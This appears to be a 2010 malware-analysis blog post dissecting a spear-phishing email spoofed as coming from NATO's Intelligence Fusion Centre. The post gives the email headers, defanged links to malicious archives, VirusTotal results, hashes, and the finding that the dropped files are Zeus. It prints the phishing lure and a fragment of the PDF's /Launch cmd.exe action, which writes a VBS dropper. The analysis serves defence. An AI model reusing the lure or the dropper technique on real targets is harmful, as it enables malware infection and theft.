Update: Please read detailed analysis of this and associated attacks
Crime or Espionage? by Nart Villeneuve
Download as a password protected archive (contact me if you need the password)
Intelligence Fusion Centre
In support of NATO
RAF Molesworth, United Kingdom
Unit 8845 Box 300, Huntingdon
CAMBS PE28 0QB
FROM: Intelligence Fusion Centre
SUBJECT: Military operation of the EU
Additional information can be found in the following report:
http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.ip
> EUROPEAN UNION
> EUROPEAN SECURITY AND DEFENCE POLICY
> Military operation of the EU
> EU NAVFOR Somalia
>
> This military operation, called EU NAVFOR Somalia - operation
> "Atalanta", is launched in support of Resolutions 1814 (2008), 1816
> (2008), 1838 (2008) and 1846 (2008) of the United Nations Security Council (UNSC) in order to contribute to:
> - the protection of vessels of the WFP (World Food Programme) delivering food aid to displaced
> persons in Somalia;
> - the protection of vulnerable vessels cruising off the Somali coast, and the deterrence, prevention
> and repression of acts of piracy and armed robbery off the Somali coast.
> This operation, which is the first EU maritime operation, is conducted
> in the framework of the European Security and Defence Policy (ESDP).
>
>
> More information and background documents available on
> http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
> and
> http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN. zip
>
> ________________________________________
> PRESS - EU Council Secretariat Tel: +32 (0)2 281 7640 / 6319
Headers
X-VirusChecked: Checked
X-Env-Sender: gnarusm@mail.thecopperstar.com
X-Msg-Ref: xxxxxxxxxxx
X-StarScan-Version: 6.2.4; banners=-,-,-
X-Originating-IP: [174.132.255.10]
X-SpamReason: No, hits=1.0 required=7.0 tests=BODY_RANDOMQ
Received: (qmail 15068 invoked from network); 26 Aug 2010 13:24:33 -0000
Received: from a.ff.84ae.static.theplanet.com (HELO mail.thecopperstar.com)
(174.132.255.10) by xxxxxxxxxx
DHE-RSA-AES256-SHA encrypted SMTP; 26 Aug 2010 13:24:33 -0000
Received: from gnarusm by mail.thecopperstar.com with local (Exim 4.69)
(envelope-from <gnarusm@mail.thecopperstar. com>) id
1OocRS-0006Y5-PR for
XXXXXXXXXX; Thu, 26 Aug 2010 08:24:30 -0500
To: XXXXXXXXX
Subject: From Intelligence Fusion Centre to XXXXXXX
From: <ifc@ifc.nato.int>
Message-ID: <E1OocRS-0006Y5-PR@mail. thecopperstar.com>
Date: Thu, 26 Aug 2010 08:24:30 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - mail.thecopperstar.com
X-Env-Sender: gnarusm@mail.thecopperstar.com
X-Msg-Ref: xxxxxxxxxxx
X-StarScan-Version: 6.2.4; banners=-,-,-
X-Originating-IP: [174.132.255.10]
X-SpamReason: No, hits=1.0 required=7.0 tests=BODY_RANDOMQ
Received: (qmail 15068 invoked from network); 26 Aug 2010 13:24:33 -0000
Received: from a.ff.84ae.static.theplanet.com (HELO mail.thecopperstar.com)
(174.132.255.10) by xxxxxxxxxx
DHE-RSA-AES256-SHA encrypted SMTP; 26 Aug 2010 13:24:33 -0000
Received: from gnarusm by mail.thecopperstar.com with local (Exim 4.69)
(envelope-from <gnarusm@mail.thecopperstar.
XXXXXXXXXX; Thu, 26 Aug 2010 08:24:30 -0500
To: XXXXXXXXX
Subject: From Intelligence Fusion Centre to XXXXXXX
From: <ifc@ifc.nato.int>
Message-ID: <E1OocRS-0006Y5-PR@mail.
Date: Thu, 26 Aug 2010 08:24:30 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - mail.thecopperstar.com
174.132.255.10
Hostname: a.ff.84ae.static.theplanet.com
ISP: THEPLANET.COM INTERNET SERVICES
Organization: THEPLANET.COM INTERNET SERVICES
Type: Broadband
Assignment: Static IP
Country: United States
State/Region: Texas
ISP: THEPLANET.COM INTERNET SERVICES
Organization: THEPLANET.COM INTERNET SERVICES
Type: Broadband
Assignment: Static IP
Country: United States
State/Region: Texas
http://www.virustotal.com/file-scan/report.html?id=5761e303d7bc027df47b5b01a3e4e8e186eb36d3a4f40956768231ef3bbcac46-1282832496
Submission date: 2010-08-26 14:21:36 (UTC)
Current status: finished
Result: 11 /41 (26.8%)
Avast 4.8.1351.0 2010.08.26 PDF:Risk-A
Avast5 5.0.594.0 2010.08.26 PDF:Risk-A
BitDefender 7.2 2010.08.26 Exploit.PDF-Dropper.Gen
eSafe 7.0.17.0 2010.08.26 PDF.DropperExploit.Gen
eTrust-Vet 36.1.7818 2010.08.26 PDF/Pidief.RU
F-Secure 9.0.15370.0 2010.08.26 Exploit.PDF-Dropper.Gen
GData 21 2010.08.26 Exploit.PDF-Dropper.Gen
Kaspersky 7.0.0.125 2010.08.26 Trojan-Dropper.VBS.Pdfka.b
nProtect 2010-08-26.01 2010.08.26 Exploit.PDF-Dropper.Gen
PCTools 7.0.3.5 2010.08.26 Trojan.Dropper
SUPERAntiSpyware 4.40.0.1006 2010.08.26 -
Symantec 20101.1.1.7 2010.08.26 Trojan.Dropper
Additional informationShow all
MD5 : 8b3a3c4386e4d59c6665762f53e6ec8e
/Type /Action
/S /Launch
/Win /F (cmd.exe)
/P (
/c echo Dim BinaryStream > vbs1.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream")
-------------------------------------------------
Windows XPSP2 Adobe Reader 9.1
Quick flash of CMD.exe black window and we are looking at a pretty new icon on the desktop exe.exe
Files created
c:\windows\system32\ntos.exe 28C4648F05F46A3EC37D664CEE0D84A8
same directory as the original file - exe.exe 5fb94eef8bd57fe8e20ccc56e33570c5
And these are the classic signs of old Zeus and this is what it is.
File name:
exe.exe
http://www.virustotal.com/file-scan/report.html?id=33ac66e78d410d03f5644fb1569ea7d28e823561e00b86593d9022f554127c7e-1282847843
3 /41 (7.3%)
AntiVir 8.2.4.46 2010.08.26 TR/Crypt.XPACK.Gen2
PCTools 7.0.3.5 2010.08.26 Trojan.Zbot
Symantec 20101.1.1.7 2010.08.26 Trojan.Zbot
Additional information
Show all
MD5 : 5fb94eef8bd57fe8e20ccc56e33570c5
File name: ntos.exe
http://www.virustotal.com/file-scan/report.html?id=c61fdc96fb7861396d7aa99a26cb6dff3f92aeeccf93d212a8fa3e166adec6aa-1282850806
Submission date: 2010-08-26 19:26:46 (UTC)
Result: 4 /39 (10.3%)
AntiVir 8.2.4.46 2010.08.26 TR/Crypt.XPACK.Gen2
Panda 10.0.2.7 2010.08.26 Suspicious file
PCTools 7.0.3.5 2010.08.26 Trojan.Zbot
Symantec 20101.1.1.7 2010.08.26 Trojan.Zbot
Additional informationShow all
MD5 : 28c4648f05f46a3ec37d664cee0d84a8
No comments:
Post a Comment